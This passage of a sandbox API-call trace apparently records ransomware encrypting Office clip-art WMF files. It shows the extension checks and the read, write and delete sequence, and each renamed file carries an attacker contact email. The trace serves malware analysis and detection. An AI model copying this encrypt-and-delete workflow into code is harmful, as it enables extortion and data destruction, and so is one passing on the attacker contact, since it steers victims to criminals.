lpString2=".WMF") returned -1 [0197.266] lstrlenW (lpString=".bz2") returned 4 [0197.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.267] lstrlenW (lpString=".7z") returned 3 [0197.267] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.267] lstrlenW (lpString=".dbf") returned 4 [0197.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.267] lstrlenW (lpString=".1cd") returned 4 [0197.267] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.267] lstrlenW (lpString=".jpg") returned 4 [0197.267] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.267] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.267] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.268] GetLastError () returned 0x0 [0197.268] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x51aa, lpOverlapped=0x0) returned 1 [0197.271] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x51b0, lpOverlapped=0x0) returned 1 [0197.272] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.272] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.272] SetEndOfFile (hFile=0x338) returned 1 [0197.272] CloseHandle (hObject=0x338) returned 1 [0197.273] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.273] SetEndOfFile (hFile=0x364) returned 1 [0197.274] CloseHandle (hObject=0x364) returned 1 [0197.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0168644.wmf")) returned 1 [0197.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.275] lstrlenW (lpString=".doc") returned 4 [0197.275] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.275] lstrlenW (lpString=".docx") returned 5 [0197.275] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0197.275] lstrlenW (lpString=".pdf") returned 4 [0197.275] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.275] lstrlenW (lpString=".xls") returned 4 [0197.275] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.275] lstrlenW (lpString=".xlsx") returned 5 [0197.275] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0197.275] lstrlenW (lpString=".ppt") returned 4 [0197.275] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.275] lstrlenW (lpString=".zip") returned 4 [0197.275] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.275] lstrlenW (lpString=".rar") returned 4 [0197.275] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.275] lstrlenW (lpString=".bz2") returned 4 [0197.275] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.275] lstrlenW (lpString=".7z") returned 3 [0197.275] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.275] lstrlenW (lpString=".dbf") returned 4 [0197.275] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.276] lstrlenW (lpString=".1cd") returned 4 [0197.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0168644.WMF") returned 68 [0197.276] lstrlenW (lpString=".jpg") returned 4 [0197.276] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.276] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.276] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.277] GetLastError () returned 0x0 [0197.277] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3888, lpOverlapped=0x0) returned 1 [0197.279] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3890, lpOverlapped=0x0) returned 1 [0197.280] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.280] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.280] SetEndOfFile (hFile=0x338) returned 1 [0197.280] CloseHandle (hObject=0x338) returned 1 [0197.280] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.280] SetEndOfFile (hFile=0x364) returned 1 [0197.281] CloseHandle (hObject=0x364) returned 1 [0197.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171685.wmf")) returned 1 [0197.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.282] lstrlenW (lpString=".doc") returned 4 [0197.282] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.282] lstrlenW (lpString=".docx") returned 5 [0197.282] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.282] lstrlenW (lpString=".pdf") returned 4 [0197.282] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.282] lstrlenW (lpString=".xls") returned 4 [0197.282] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.283] lstrlenW (lpString=".xlsx") returned 5 [0197.283] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.283] lstrlenW (lpString=".ppt") returned 4 [0197.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.283] lstrlenW (lpString=".zip") returned 4 [0197.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.283] lstrlenW (lpString=".rar") returned 4 [0197.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.283] lstrlenW (lpString=".bz2") returned 4 [0197.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.283] lstrlenW (lpString=".7z") returned 3 [0197.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.283] lstrlenW (lpString=".dbf") returned 4 [0197.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.283] lstrlenW (lpString=".1cd") returned 4 [0197.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171685.WMF") returned 68 [0197.283] lstrlenW (lpString=".jpg") returned 4 [0197.283] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.283] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.283] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.284] GetLastError () returned 0x0 [0197.284] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1ae8, lpOverlapped=0x0) returned 1 [0197.286] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1af0, lpOverlapped=0x0) returned 1 [0197.287] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.287] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.287] SetEndOfFile (hFile=0x338) returned 1 [0197.287] CloseHandle (hObject=0x338) returned 1 [0197.287] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.287] SetEndOfFile (hFile=0x364) returned 1 [0197.288] CloseHandle (hObject=0x364) returned 1 [0197.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.288] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0171847.wmf")) returned 1 [0197.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.289] lstrlenW (lpString=".doc") returned 4 [0197.289] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.289] lstrlenW (lpString=".docx") returned 5 [0197.289] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.289] lstrlenW (lpString=".pdf") returned 4 [0197.289] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.289] lstrlenW (lpString=".xls") returned 4 [0197.289] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.289] lstrlenW (lpString=".xlsx") returned 5 [0197.289] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.289] lstrlenW (lpString=".ppt") returned 4 [0197.289] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.289] lstrlenW (lpString=".zip") returned 4 [0197.289] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.289] lstrlenW (lpString=".rar") returned 4 [0197.289] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.289] lstrlenW (lpString=".bz2") returned 4 [0197.289] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.289] lstrlenW (lpString=".7z") returned 3 [0197.290] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.290] lstrlenW (lpString=".dbf") returned 4 [0197.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.290] lstrlenW (lpString=".1cd") returned 4 [0197.290] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0171847.WMF") returned 68 [0197.290] lstrlenW (lpString=".jpg") returned 4 [0197.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.290] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.290] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.291] GetLastError () returned 0x0 [0197.291] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1d18, lpOverlapped=0x0) returned 1 [0197.292] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1d20, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1d20, lpOverlapped=0x0) returned 1 [0197.293] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.293] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.293] SetEndOfFile (hFile=0x338) returned 1 [0197.293] CloseHandle (hObject=0x338) returned 1 [0197.293] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.294] SetEndOfFile (hFile=0x364) returned 1 [0197.294] CloseHandle (hObject=0x364) returned 1 [0197.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172035.wmf")) returned 1 [0197.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.295] lstrlenW (lpString=".doc") returned 4 [0197.295] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.295] lstrlenW (lpString=".docx") returned 5 [0197.295] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.295] lstrlenW (lpString=".pdf") returned 4 [0197.295] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.295] lstrlenW (lpString=".xls") returned 4 [0197.295] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.295] lstrlenW (lpString=".xlsx") returned 5 [0197.295] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.295] lstrlenW (lpString=".ppt") returned 4 [0197.295] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.295] lstrlenW (lpString=".zip") returned 4 [0197.295] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.296] lstrlenW (lpString=".rar") returned 4 [0197.296] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.296] lstrlenW (lpString=".bz2") returned 4 [0197.296] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.296] lstrlenW (lpString=".7z") returned 3 [0197.296] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.296] lstrlenW (lpString=".dbf") returned 4 [0197.296] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.296] lstrlenW (lpString=".1cd") returned 4 [0197.296] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172035.WMF") returned 68 [0197.296] lstrlenW (lpString=".jpg") returned 4 [0197.296] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.296] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.296] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.297] GetLastError () returned 0x0 [0197.297] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1b74, lpOverlapped=0x0) returned 1 [0197.596] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1b80, lpOverlapped=0x0) returned 1 [0197.597] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.597] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.598] SetEndOfFile (hFile=0x338) returned 1 [0197.598] CloseHandle (hObject=0x338) returned 1 [0197.598] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.598] SetEndOfFile (hFile=0x364) returned 1 [0197.599] CloseHandle (hObject=0x364) returned 1 [0197.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172067.wmf")) returned 1 [0198.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.010] lstrlenW (lpString=".doc") returned 4 [0198.010] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString=".docx") returned 5 [0198.010] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.010] lstrlenW (lpString=".pdf") returned 4 [0198.010] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString=".xls") returned 4 [0198.010] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.010] lstrlenW (lpString=".xlsx") returned 5 [0198.010] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.010] lstrlenW (lpString=".ppt") returned 4 [0198.010] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.010] lstrlenW (lpString=".zip") returned 4 [0198.010] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.010] lstrlenW (lpString=".rar") returned 4 [0198.010] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString=".bz2") returned 4 [0198.010] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString=".7z") returned 3 [0198.010] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.010] lstrlenW (lpString=".dbf") returned 4 [0198.010] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.010] lstrlenW (lpString=".1cd") returned 4 [0198.011] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172067.WMF") returned 68 [0198.011] lstrlenW (lpString=".jpg") returned 4 [0198.011] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.011] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182898.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182898.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0198.012] GetLastError () returned 0x0 [0198.012] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3b2e, lpOverlapped=0x0) returned 1 [0198.014] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: 